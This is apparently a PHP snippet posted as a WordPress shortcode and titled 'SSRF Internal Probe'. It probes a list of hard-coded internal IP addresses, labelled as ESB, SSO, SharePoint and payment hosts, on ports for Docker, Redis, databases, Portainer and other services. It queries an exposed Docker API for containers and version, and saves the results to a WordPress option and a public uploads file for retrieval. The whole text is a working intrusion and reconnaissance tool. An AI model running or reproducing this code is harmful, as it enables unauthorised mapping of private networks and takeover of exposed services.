SSRF Internal Probe – PHP Shortcode

[php]
// Probe internal services and write results
$out = “”;
$probes = array(
“ESB HTTP” => “http://116.100.94.201/”,
“ESB 8080” => “http://116.100.94.201:8080/”,
“ESB 8443” => “https://116.100.94.201:8443/”,
“SSO 80” => “http://116.100.94.202/”,
“SharePoint 80” => “http://116.100.94.203/”,
“Info 80” => “http://116.100.94.204/”,
“Payment 80” => “http://116.100.94.205/”,
“HTX 80” => “http://116.100.94.206/”,
“Docker API” => “http://116.100.94.201:2375/”,
“Redis” => “http://116.100.94.201:6379/”,
“Elasticsearch” => “http://116.100.94.201:9200/”,
“MongoDB” => “http://116.100.94.201:27017/”,
“Grafana” => “http://116.100.94.201:3000/”,
“Prometheus” => “http://116.100.94.201:9090/”,
“Kibana” => “http://116.100.94.201:5601/”,
“ActiveMQ” => “http://116.100.94.201:8161/”,
“MySQL” => “http://116.100.94.201:3306/”,
“SQL Server” => “http://116.100.94.201:1433/”,
“PostgreSQL” => “http://116.100.94.201:5432/”,
“Oracle” => “http://116.100.94.201:1521/”,
“Memcached” => “http://116.100.94.201:11211/”,
“Portainer” => “http://116.100.94.201:9000/”,
“RabbitMQ” => “http://116.100.94.201:15672/”,
“Webmin” => “http://116.100.94.201:10000/”,
);

foreach ($probes as $name => $url) {
$out .= $name . “:\n”;
$ctx = stream_context_create(array(“http” => array(“timeout” => 5, “follow_location” => 0)));
$result = @file_get_contents($url, false, $ctx);
if ($result === FALSE) {
$out .= ” FAILED (connection refused or timeout)\n”;
} else {
$out .= ” RESPONSE (” . strlen($result) . ” bytes):\n”;
$out .= ” ” . substr($result, 0, 500) . “\n”;
}
$out .= “\n”;
}

// Also try Docker API for container list
$docker_url = “http://116.100.94.201:2375/containers/json?all=true”;
$ctx = stream_context_create(array(“http” => array(“timeout” => 5)));
$docker_result = @file_get_contents($docker_url, false, $ctx);
if ($docker_result !== FALSE) {
$out .= “DOCKER CONTAINERS: ” . $docker_result . “\n”;
} else {
$out .= “DOCKER API: FAILED\n”;
}

// Try Docker API version check
$docker_ver = @file_get_contents(“http://116.100.94.201:2375/version”, false, $ctx);
if ($docker_ver !== FALSE) {
$out .= “DOCKER VERSION: ” . $docker_ver . “\n”;
}

// Store results as WordPress option
update_option(“ssrf_probe_results”, $out);

// Also try to write to a known file
$write_path = “/var/www/html/wp-content/uploads/ssrf_results.txt”;
@file_put_contents($write_path, $out);
$out .= “\nAlso written to: ” . $write_path . “\n”;

echo “SSRF_PROBE_COMPLETE”;
[/php]